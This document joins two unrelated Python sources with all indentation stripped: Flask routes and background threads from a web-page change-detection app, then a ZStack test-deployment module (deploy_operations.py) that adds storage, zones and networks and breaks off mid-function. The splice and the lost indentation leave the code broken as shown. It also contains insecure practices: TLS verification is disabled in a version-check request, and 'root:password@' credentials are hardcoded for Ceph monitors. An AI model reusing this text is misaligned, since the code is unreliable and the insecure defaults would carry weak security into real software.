os.path.join(datastore_o.datastore_path, list_with_tags_file), "w"
) as f:
for uuid in datastore.data["watching"]:
url = datastore.data["watching"][uuid]["url"]
tag = datastore.data["watching"][uuid]["tag"]
f.write("{} {}\r\n".format(url, tag))
# Add it to the Zip
zipObj.write(
os.path.join(datastore_o.datastore_path, list_file),
arcname=list_file,
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8,
)
zipObj.write(
os.path.join(datastore_o.datastore_path, list_with_tags_file),
arcname=list_with_tags_file,
compress_type=zipfile.ZIP_DEFLATED,
compresslevel=8,
)
# send_from_directory needs the full absolute path of the directory
return send_from_directory(os.path.abspath(datastore_o.datastore_path), backupname, as_attachment=True)
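# Serves per-watch screenshots and visual-selector element data (both require login when a
# password is set), falling back to regular static assets for any other group.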
@app.route("/static/<string:group>/<string:filename>", methods=['GET'])
def static_content(group, filename):
from flask import make_response
if group == 'screenshot':
# Could be sensitive, follow password requirements
if datastore.data['settings']['application']['password'] and not flask_login.current_user.is_authenticated:
abort(403)
# These files should be in our subdirectory
try:
# set nocache, set content-type
watch_dir = datastore_o.datastore_path + "/" + filename
response = make_response(send_from_directory(filename="last-screenshot.png", directory=watch_dir, path=watch_dir + "/last-screenshot.png"))
response.headers['Content-type'] = 'image/png'
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = 0
return response
except FileNotFoundError:
abort(404)
if group == 'visual_selector_data':
# Could be sensitive, follow password requirements
if datastore.data['settings']['application']['password'] and not flask_login.current_user.is_authenticated:
abort(403)
# These files should be in our subdirectory
try:
# set nocache, set content-type
watch_dir = datastore_o.datastore_path + "/" + filename
response = make_response(send_from_directory(filename="elements.json", directory=watch_dir, path=watch_dir + "/elements.json"))
response.headers['Content-type'] = 'application/json'
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
response.headers['Expires'] = 0
return response
except FileNotFoundError:
abort(404)
# These files should be in our subdirectory
try:
return send_from_directory("static/{}".format(group), path=filename)
except FileNotFoundError:
abort(404)
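# Quick-add endpoint: validates the submitted URL, rejects duplicates, creates the watch and
# queues it for an immediate check.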
@app.route("/api/add", methods=['POST'])
@login_required
def form_watch_add():
from changedetectionio import forms
form = forms.quickWatchForm(request.form)
if not form.validate():
flash("Error")
return redirect(url_for('index'))
url = request.form.get('url').strip()
if datastore.url_exists(url):
flash('The URL {} already exists'.format(url), "error")
return redirect(url_for('index'))
# @todo add_watch should throw a custom Exception for validation etc
new_uuid = datastore.add_watch(url=url, tag=request.form.get('tag').strip())
if new_uuid:
# Straight into the queue.
update_q.put(new_uuid)
flash("Watch added.")
return redirect(url_for('index'))
@app.route("/api/delete", methods=['GET'])
@login_required
def form_delete():
uuid = request.args.get('uuid')
if uuid != 'all' and uuid not in datastore.data['watching'].keys():
flash('The watch by UUID {} does not exist.'.format(uuid), 'error')
return redirect(url_for('index'))
# Mostly for testing; makes it possible to address the first/only watch
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
datastore.delete(uuid)
flash('Deleted.')
return redirect(url_for('index'))
@app.route("/api/clone", methods=['GET'])
@login_required
def form_clone():
uuid = request.args.get('uuid')
# Mostly for testing; makes it possible to address the first/only watch
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
new_uuid = datastore.clone(uuid)
update_q.put(new_uuid)
flash('Cloned.')
return redirect(url_for('index'))
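# Recheck endpoint: queues a single watch by UUID, every non-paused watch carrying a tag,
# or every non-paused watch when neither is given, skipping anything already being fetched.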
@app.route("/api/checknow", methods=['GET'])
@login_required
def form_watch_checknow():
tag = request.args.get('tag')
uuid = request.args.get('uuid')
i = 0
running_uuids = []
for t in running_update_threads:
running_uuids.append(t.current_uuid)
# @todo check thread is running and skip
if uuid:
if uuid not in running_uuids:
update_q.put(uuid)
i = 1
elif tag is not None:
# Items that have this current tag
for watch_uuid, watch in datastore.data['watching'].items():
if tag is not None and tag in watch['tag']:
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
else:
# No tag, no uuid, add everything.
for watch_uuid, watch in datastore.data['watching'].items():
if watch_uuid not in running_uuids and not datastore.data['watching'][watch_uuid]['paused']:
update_q.put(watch_uuid)
i += 1
flash("{} watches are queued for rechecking.".format(i))
return redirect(url_for('index', tag=tag))
@app.route("/api/share-url", methods=['GET'])
@login_required
def form_share_put_watch():
"""Given a watch UUID, upload the info and return a share-link
the share-link can be imported/added"""
import requests
import json
tag = request.args.get('tag')
uuid = request.args.get('uuid')
# mostly for testing
if uuid == 'first':
uuid = list(datastore.data['watching'].keys()).pop()
# copy it to memory as we trim off what we don't need (history)
watch = deepcopy(datastore.data['watching'][uuid])
# For older versions that are not a @property
if (watch.get('history')):
del (watch['history'])
# for safety/privacy
for k in list(watch.keys()):
if k.startswith('notification_'):
del watch[k]
for r in ['uuid', 'last_checked', 'last_changed']:
if watch.get(r):
del (watch[r])
# Add the global stuff which may have an impact
watch['ignore_text'] += datastore.data['settings']['application']['global_ignore_text']
watch['subtractive_selectors'] += datastore.data['settings']['application']['global_subtractive_selectors']
watch_json = json.dumps(watch)
try:
r = requests.request(method="POST",
data={'watch': watch_json},
url="https://changedetection.io/share/share",
headers={'App-Guid': datastore.data['app_guid']})
res = r.json()
session['share-link'] = "https://changedetection.io/share/{}".format(res['share_key'])
except Exception as e:
logging.error("Error sharing -{}".format(str(e)))
flash("Could not share, something went wrong while communicating with the share server - {}".format(str(e)), 'error')
# e.g. https://changedetection.io/share/VrMv05wpXyQa opened in the browser
# should give a nice info page that the watch can be pasted in / imported from
return redirect(url_for('index'))
# @todo handle ctrl break
ticker_thread = threading.Thread(target=ticker_thread_check_time_launch_checks).start()
threading.Thread(target=notification_runner).start()
# Check for new release version, but not when running in test/build
if not os.getenv("GITHUB_REF", False):
threading.Thread(target=check_for_new_version).start()
return app
# Check for new version and anonymous stats
def check_for_new_version():
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
while not app.config.exit.is_set():
try:
r = requests.post("https://changedetection.io/check-ver.php",
data={'version': __version__,
'app_guid': datastore.data['app_guid'],
'watch_count': len(datastore.data['watching'])
},
verify=False)
except:
pass
try:
if "new_version" in r.text:
app.config['NEW_VERSION_AVAILABLE'] = True
except:
pass
# Check daily
app.config.exit.wait(86400)
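# Single background runner that drains the notification queue, hands each item to
# notification.process_notification() and records delivery errors in the debug log.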
def notification_runner():
global notification_debug_log
while not app.config.exit.is_set():
try:
# At the moment only one thread runs (single runner)
n_object = notification_q.get(block=False)
except queue.Empty:
time.sleep(1)
else:
# Process notifications
try:
from changedetectionio import notification
notification.process_notification(n_object, datastore)
except Exception as e:
logging.error("Watch URL: {} Error {}".format(n_object['watch_url'], str(e)))
# UUID won't be present when we submit a 'test' from the global settings
if 'uuid' in n_object:
datastore.update_watch(uuid=n_object['uuid'],
update_obj={'last_notification_error': "Notification error detected, please see logs."})
log_lines = str(e).splitlines()
notification_debug_log += log_lines
# Trim the log length
notification_debug_log = notification_debug_log[-100:]
# Thread runner to check every minute, look for new watches to feed into the Queue.
def ticker_thread_check_time_launch_checks():
from changedetectionio import update_worker
import logging
# Spin up Workers that do the fetching
# Can be overridden by the FETCH_WORKERS env var, otherwise use the default settings
n_workers = int(os.getenv("FETCH_WORKERS", datastore.data['settings']['requests']['workers']))
for _ in range(n_workers):
new_worker = update_worker.update_worker(update_q, notification_q, app, datastore)
running_update_threads.append(new_worker)
new_worker.start()
while not app.config.exit.is_set():
# Get a list of watches by UUID that are currently fetching data
running_uuids = []
for t in running_update_threads:
if t.current_uuid:
running_uuids.append(t.current_uuid)
# Re #232 - Grab the keys safely in case the data changes while we're iterating through it all
watch_uuid_list = []
while True:
try:
watch_uuid_list = datastore.data['watching'].keys()
except RuntimeError as e:
# RuntimeError: dictionary changed size during iteration
time.sleep(0.1)
else:
break
# Re #438 - Don't place more watches in the queue to be checked if the queue is already large
while update_q.qsize() >= 2000:
time.sleep(1)
# Check for watches outside of the time threshold to put in the thread queue.
now = time.time()
recheck_time_minimum_seconds = int(os.getenv('MINIMUM_SECONDS_RECHECK_TIME', 60))
recheck_time_system_seconds = datastore.threshold_seconds
for uuid in watch_uuid_list:
watch = datastore.data['watching'].get(uuid)
if not watch:
logging.error("Watch: {} no longer present.".format(uuid))
continue
# No need to do further processing if it's paused
if watch['paused']:
continue
# If they supplied an individual recheck time for this watch, use it as the threshold, otherwise use the system-wide setting.
threshold = now
watch_threshold_seconds = watch.threshold_seconds()
if watch_threshold_seconds:
threshold -= watch_threshold_seconds
else:
threshold -= recheck_time_system_seconds
# Yeah, put it in the queue, it's more than time
if watch['last_checked'] <= max(threshold, recheck_time_minimum_seconds):
if uuid not in running_uuids and uuid not in update_q.queue:
update_q.put(uuid)
# Wait a few seconds before checking the list again
time.sleep(3)
# Should be low so we can break this out in testing
app.config.exit.wait(1)
deploy_operations.py
'''
Deploy operations for setting up the ZStack database.
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import apibinding.api_actions as api_actions
import account_operations
import resource_operations as res_ops
import zstacklib.utils.sizeunit as sizeunit
import zstacklib.utils.jsonobject as jsonobject
import zstacklib.utils.xmlobject as xmlobject
import zstacklib.utils.lock as lock
import apibinding.inventory as inventory
import os
import sys
import traceback
import threading
import time
# Global exception information for thread usage
exc_info = []
AddKVMHostTimeOut = 10*60*1000
IMAGE_THREAD_LIMIT = 2
DEPLOY_THREAD_LIMIT = 500
def get_first_item_from_list(list_obj, list_obj_name, list_obj_value, action_name):
'''
Check that the list is not empty; if so, return the first (and only expected) item.
list_obj: the list to check and return from;
list_obj_name: the type name of the list items;
list_obj_value: the value that was used in the previous query;
action_name: the action that is calling this function
'''
if not isinstance(list_obj, list):
raise test_util.TestError("The first parameter is not a [list] type")
if not list_obj:
raise test_util.TestError("Did not find %s: [%s], when adding %s" % (list_obj_name, list_obj_value, action_name))
if len(list_obj) > 1:
raise test_util.TestError("Find more than 1 [%s] resource with name: [%s], when adding %s. Please check your deploy.xml and make sure resource do NOT have duplicated name " % (list_obj_name, list_obj_value, action_name))
return list_obj[0]
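# Example usage of get_first_item_from_list, mirroring the calls later in this file:
#   zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone.name_)
#   zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')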
def get_ceph_storages_mon_nic_id(ceph_name, scenario_config):
for host in xmlobject.safe_list(scenario_config.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
nic_id = 0
for l3network in xmlobject.safe_list(vm.l3Networks.l3Network):
if hasattr(l3network, 'backupStorageRef') and hasattr(l3network.backupStorageRef, 'monIp_') and l3network.backupStorageRef.text_ == ceph_name:
return nic_id
if hasattr(l3network, 'primaryStorageRef') and hasattr(l3network.primaryStorageRef, 'monIp_') and l3network.primaryStorageRef.text_ == ceph_name:
return nic_id
nic_id += 1
for host in xmlobject.safe_list(scenario_config.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
nic_id = 0
for l3network in xmlobject.safe_list(vm.l3Networks.l3Network):
if hasattr(l3network, 'backupStorageRef') and l3network.backupStorageRef.text_ == ceph_name:
return nic_id
if hasattr(l3network, 'primaryStorageRef') and l3network.primaryStorageRef.text_ == ceph_name:
return nic_id
nic_id += 1
return None
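# Resolve the IP address(es) of the scenario-file VM(s) that back the named backup storage;
# ceph-backed storages prefer the monitor NIC's IP when one is configured.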
def get_backup_storage_from_scenario_file(backupStorageRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return []
import scenario_operations as sce_ops
zstack_management_ip = scenarioConfig.basicConfig.zstackManagementIp.text_
ip_list = []
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'backupStorageRef'):
if backupStorageRefName == vm.backupStorageRef.text_:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
if vm.backupStorageRef.type_ == 'ceph':
nic_id = get_ceph_storages_mon_nic_id(vm.backupStorageRef.text_, scenarioConfig)
if nic_id == None:
ip_list.append(s_vm.ip_)
else:
ip_list.append(s_vm.ips.ip[nic_id].ip_)
else:
for l3Network in xmlobject.safe_list(vm.l3Networks.l3Network):
if xmlobject.has_element(l3Network, 'backupStorageRef') and backupStorageRefName in [ backupStorageRef.text_ for backupStorageRef in l3Network.backupStorageRef]:
#if xmlobject.has_element(l3Network, 'backupStorageRef') and l3Network.backupStorageRef.text_ == backupStorageRefName:
cond = res_ops.gen_query_conditions('name', '=', vm.name_)
vm_inv_nics = sce_ops.query_resource(zstack_management_ip, res_ops.VM_INSTANCE, cond).inventories[0].vmNics
for vm_inv_nic in vm_inv_nics:
if vm_inv_nic.l3NetworkUuid == l3Network.uuid_:
ip_list.append(vm_inv_nic.ip)
return ip_list
#ip_list.append(s_vm.ip_)
return ip_list
#Add Backup Storage
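# add_backup_storage spawns one worker thread per configured backup storage entry (SFTP,
# ImageStore, Ceph, XSky, Fusionstor, Simulator) and waits for all of them to finish.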
def add_backup_storage(scenarioConfig, scenarioFile, deployConfig, session_uuid):
if xmlobject.has_element(deployConfig, 'backupStorages.sftpBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.sftpBackupStorage):
action = api_actions.AddSftpBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
action.url = bs.url_
action.username = bs.username_
action.password = bs.password_
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) == 0:
action.hostname = bs.hostname_
else:
action.hostname = hostname_list[0]
if hasattr(bs, 'port_'):
action.port = bs.port_
action.sshport = bs.port_
action.sshPort = bs.port_
action.timeout = AddKVMHostTimeOut # some platforms execute salt slowly
action.type = inventory.SFTP_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.imageStoreBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.imageStoreBackupStorage):
action = api_actions.AddImageStoreBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
action.url = bs.url_
action.username = bs.username_
action.password = bs.password_
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) == 0:
action.hostname = bs.hostname_
else:
action.hostname = hostname_list[0]
if hasattr(bs, 'port_'):
action.port = bs.port_
action.sshport = bs.port_
action.sshPort = bs.port_
action.timeout = AddKVMHostTimeOut # some platforms execute salt slowly
action.type = inventory.IMAGE_STORE_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.cephBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.cephBackupStorage):
action = api_actions.AddCephBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
# TODO: username and password should be configurable
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
action.monUrls = bs.monUrls_.split(';')
if bs.poolName__:
action.poolName = bs.poolName_
action.timeout = AddKVMHostTimeOut # some platforms execute salt slowly
action.type = inventory.CEPH_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.xskyBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.xskyBackupStorage):
action = api_actions.AddCephBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
# TODO: username and password should be configurable
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
if bs.monUrls_.find(';') == -1:
action.monUrls = [bs.monUrls_]
else:
action.monUrls = bs.monUrls_.split(';')
if bs.poolName__:
action.poolName = bs.poolName_
action.timeout = AddKVMHostTimeOut # some platforms execute salt slowly
action.type = inventory.CEPH_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.fusionstorBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.fusionstorBackupStorage):
action = api_actions.AddFusionstorBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
hostname_list = get_backup_storage_from_scenario_file(bs.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
# TODO: username and password should be configurable
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
action.monUrls = bs.monUrls_.split(';')
if bs.poolName__:
action.poolName = bs.poolName_
action.timeout = AddKVMHostTimeOut # some platforms execute salt slowly
action.type = inventory.FUSIONSTOR_BACKUP_STORAGE_TYPE
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(deployConfig, 'backupStorages.simulatorBackupStorage'):
for bs in xmlobject.safe_list(deployConfig.backupStorages.simulatorBackupStorage):
action = api_actions.AddSimulatorBackupStorageAction()
action.sessionUuid = session_uuid
action.name = bs.name_
action.description = bs.description__
action.url = bs.url_
action.type = inventory.SIMULATOR_BACKUP_STORAGE_TYPE
action.totalCapacity = sizeunit.get_size(bs.totalCapacity_)
action.availableCapacity = sizeunit.get_size(bs.availableCapacity_)
thread = threading.Thread(target = _thread_for_action, args = (action, ))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
#Add Zones
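# add_zone creates each zone (honouring the duplication__ attribute) and attaches any
# referenced backup storages to it.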
def add_zone(scenarioConfig, scenarioFile, deployConfig, session_uuid, zone_name = None):
def _add_zone(zone, zone_duplication):
action = api_actions.CreateZoneAction()
action.sessionUuid = session_uuid
if zone_duplication == 0:
action.name = zone.name_
action.description = zone.description__
else:
action.name = generate_dup_name(zone.name_, zone_duplication, 'z')
action.description = generate_dup_name(zone.description__, zone_duplication, 'zone')
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
zinv = evt.inventory
except:
exc_info.append(sys.exc_info())
if xmlobject.has_element(zone, 'backupStorageRef'):
for ref in xmlobject.safe_list(zone.backupStorageRef):
bss = res_ops.get_resource(res_ops.BACKUP_STORAGE, session_uuid, name=ref.text_)
bs = get_first_item_from_list(bss, 'Backup Storage', ref.text_, 'attach backup storage to zone')
action = api_actions.AttachBackupStorageToZoneAction()
action.sessionUuid = session_uuid
action.backupStorageUuid = bs.uuid
action.zoneUuid = zinv.uuid
try:
evt = action.run()
test_util.test_logger(jsonobject.dumps(evt))
except:
exc_info.append(sys.exc_info())
if not xmlobject.has_element(deployConfig, 'zones.zone'):
return
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone_name != zone.name_:
continue
if zone.duplication__ == None:
duplication = 1
else:
duplication = int(zone.duplication__)
for i in range(duplication):
thread = threading.Thread(target=_add_zone, args=(zone, i, ))
wait_for_thread_queue()
thread.start()
wait_for_thread_done()
#Add L2 network
def add_l2_network(scenarioConfig, scenarioFile, deployConfig, session_uuid, l2_name = None, zone_name = None):
'''
If a name is provided, only the L2 network with that name will be added.
'''
if not xmlobject.has_element(deployConfig, "zones.zone"):
return
def _deploy_l2_vxlan_network(zone):
if not xmlobject.has_element(deployConfig, "l2VxlanNetworkPools"):
return
for l2pool in xmlobject.safe_list(deployConfig.l2VxlanNetworkPools.l2VxlanNetworkPool):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'L2 network')
action = api_actions.CreateL2VxlanNetworkPoolAction()
action.name = l2pool.name_
action.zoneUuid = zinv.uuid
action.sessionUuid = session_uuid
poolinv = action.run().inventory
for vnirange in xmlobject.safe_list(l2pool.vniRanges.vniRange):
action = api_actions.CreateVniRangeAction()
action.name = vnirange.name_
action.startVni = vnirange.startVni_
action.endVni = vnirange.endVni_
action.l2NetworkUuid = poolinv.uuid
action.sessionUuid = session_uuid
evt = action.run()
def _deploy_l2_network(zone, is_vlan):
if is_vlan:
if not xmlobject.has_element(zone, "l2Networks.l2VlanNetwork"):
return
l2Network = zone.l2Networks.l2VlanNetwork
else:
if not xmlobject.has_element(zone, \
"l2Networks.l2NoVlanNetwork"):
return
l2Network = zone.l2Networks.l2NoVlanNetwork
if zone.duplication__ == None:
zone_dup = 1
else:
zone_dup = int(zone.duplication__)
for zone_ref in range(zone_dup):
zoneName = generate_dup_name(zone.name_, zone_ref, 'z')
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zoneName)
zinv = get_first_item_from_list(zinvs, 'Zone', zoneName, 'L2 network')
# can only deal with the single-cluster duplication case.
cluster = xmlobject.safe_list(zone.clusters.cluster)[0]
if cluster.duplication__ == None:
cluster_duplication = 1
else:
cluster_duplication = int(cluster.duplication__)
for cluster_ref in range(cluster_duplication):
for l2 in xmlobject.safe_list(l2Network):
if l2_name and l2_name != l2.name_:
continue
if not is_vlan or l2.duplication__ == None:
l2_dup = 1
else:
l2_dup = int(l2.duplication__)
for j in range(l2_dup):
l2Name = generate_dup_name(\
generate_dup_name(\
generate_dup_name(\
l2.name_, zone_ref, 'z')\
, cluster_ref, 'c')\
, j, 'n')
l2Des = generate_dup_name(\
generate_dup_name(\
generate_dup_name(\
l2.description_, zone_ref, 'z')\
, cluster_ref, 'c')\
, j, 'n')
if is_vlan:
l2_vlan = int(l2.vlan_) + j
if is_vlan:
action = api_actions.CreateL2VlanNetworkAction()
else:
action = api_actions.CreateL2NoVlanNetworkAction()
action.sessionUuid = session_uuid
action.name = l2Name
action.description = l2Des
if scenarioFile != None:
action.physicalInterface = l2.physicalInterface_.replace("eth", "zsn")
else:
action.physicalInterface = l2.physicalInterface_
action.zoneUuid = zinv.uuid
if is_vlan:
action.vlan = l2_vlan
thread = threading.Thread(\
target=_thread_for_action, \
args=(action,))
wait_for_thread_queue()
thread.start()
for zone in xmlobject.safe_list(deployConfig.zones.zone):
if zone_name and zone.name_ != zone_name:
continue
_deploy_l2_network(zone, False)
_deploy_l2_network(zone, True)
_deploy_l2_vxlan_network(zone)
wait_for_thread_done()
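# Resolve the IP address(es) of the scenario-file VM(s) that host the named primary storage,
# handling both a single primaryStorageRef and a list of them, and preferring the ceph monitor NIC's IP.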
def get_primary_storage_from_scenario_file(primaryStorageRefName, scenarioConfig, scenarioFile, deployConfig):
if scenarioConfig == None or scenarioFile == None or not os.path.exists(scenarioFile):
return []
ip_list = []
for host in xmlobject.safe_list(scenarioConfig.deployerConfig.hosts.host):
for vm in xmlobject.safe_list(host.vms.vm):
if xmlobject.has_element(vm, 'primaryStorageRef'):
#if vm.primaryStorageRef.text_ == primaryStorageRefName:
if isinstance(vm.primaryStorageRef,list):
for ps_each in vm.primaryStorageRef:
if ps_each.text_ == primaryStorageRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
if xmlobject.has_element(vm, 'backupStorageRef') and vm.backupStorageRef.type_ == 'ceph':
nic_id = get_ceph_storages_mon_nic_id(vm.backupStorageRef.text_, scenarioConfig)
if nic_id == None:
ip_list.append(s_vm.ip_)
else:
ip_list.append(s_vm.ips.ip[nic_id].ip_)
else:
ip_list.append(s_vm.ip_)
else:
if vm.primaryStorageRef.text_ == primaryStorageRefName:
with open(scenarioFile, 'r') as fd:
xmlstr = fd.read()
fd.close()
scenario_file = xmlobject.loads(xmlstr)
for s_vm in xmlobject.safe_list(scenario_file.vms.vm):
if s_vm.name_ == vm.name_:
if vm.backupStorageRef.type_ == 'ceph':
nic_id = get_ceph_storages_mon_nic_id(vm.backupStorageRef.text_, scenarioConfig)
if nic_id == None:
ip_list.append(s_vm.ip_)
else:
ip_list.append(s_vm.ips.ip[nic_id].ip_)
else:
ip_list.append(s_vm.ip_)
return ip_list
#Add Primary Storage
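# add_primary_storage covers iSCSI filesystem-backend, local, Ceph, XSky, Fusionstor, NFS,
# simulator and shared-mount-point primary storage types, launching one worker thread per entry.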
def add_primary_storage(scenarioConfig, scenarioFile, deployConfig, session_uuid, ps_name = None, \
zone_name = None):
if not xmlobject.has_element(deployConfig, 'zones.zone'):
test_util.test_logger('Did not find zones.zone in config, skipping primary storage deployment')
return
def _generate_sim_ps_action(zone, pr, zone_ref, cluster_ref):
if zone_ref == 0:
zone_name = zone.name_
else:
zone_name = generate_dup_name(zone.name_, zone_ref, 'z')
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, name=zone_name)
zinv = get_first_item_from_list(zinvs, 'Zone', zone_name, 'primary storage')
action = api_actions.AddSimulatorPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = generate_dup_name(generate_dup_name(pr.name_, zone_ref, 'z'), cluster_ref, 'c')
action.description = generate_dup_name(generate_dup_name(pr.description__, zone_ref, 'zone'), cluster_ref, 'cluster')
action.url = generate_dup_name(generate_dup_name(pr.url_, zone_ref, 'z'), cluster_ref, 'c')
action.type = inventory.SIMULATOR_PRIMARY_STORAGE_TYPE
action.zoneUuid = zinv.uuid
action.totalCapacity = sizeunit.get_size(pr.totalCapacity_)
action.totalPhysicalCapacity = sizeunit.get_size(pr.totalCapacity_)
action.availableCapacity = sizeunit.get_size(pr.availableCapacity_)
action.availablePhysicalCapacity = sizeunit.get_size(pr.availableCapacity_)
return action
def _deploy_primary_storage(zone):
if xmlobject.has_element(zone, 'primaryStorages.IscsiFileSystemBackendPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.IscsiFileSystemBackendPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddIscsiFileSystemBackendPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.ISCSI_FILE_SYSTEM_BACKEND_PRIMARY_STORAGE_TYPE
action.url = pr.url_
action.zoneUuid = zinv.uuid
action.chapPassword = pr.chapPassword_
action.chapUsername = pr.chapUsername_
action.sshPassword = pr.sshPassword_
action.sshUsername = pr.sshUsername_
action.hostname = pr.hostname_
action.filesystemType = pr.filesystemType_
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.localPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.localPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddLocalPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.LOCAL_STORAGE_TYPE
action.url = pr.url_
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.cephPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.cephPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddCephPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.CEPH_PRIMARY_STORAGE_TYPE
hostname_list = get_primary_storage_from_scenario_file(pr.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
action.monUrls = pr.monUrls_.split(';')
if pr.dataVolumePoolName__:
action.dataVolumePoolName = pr.dataVolumePoolName__
if pr.rootVolumePoolName__:
action.rootVolumePoolName = pr.rootVolumePoolName__
if pr.imageCachePoolName__:
action.imageCachePoolName = pr.imageCachePoolName__
action.zoneUuid = zinv.uuid
thread = threading.Thread(target=_thread_for_action, args=(action,))
wait_for_thread_queue()
thread.start()
if xmlobject.has_element(zone, 'primaryStorages.xskyPrimaryStorage'):
zinvs = res_ops.get_resource(res_ops.ZONE, session_uuid, \
name=zone.name_)
zinv = get_first_item_from_list(zinvs, 'Zone', zone.name_, 'primary storage')
for pr in xmlobject.safe_list(zone.primaryStorages.xskyPrimaryStorage):
if ps_name and ps_name != pr.name_:
continue
action = api_actions.AddXSkyPrimaryStorageAction()
action.sessionUuid = session_uuid
action.name = pr.name_
action.description = pr.description__
action.type = inventory.XSKY_PRIMARY_STORAGE_TYPE
hostname_list = get_primary_storage_from_scenario_file(pr.name_, scenarioConfig, scenarioFile, deployConfig)
if len(hostname_list) != 0:
action.monUrls = []
for hostname in hostname_list:
action.monUrls.append("root:password@%s" % (hostname))
else:
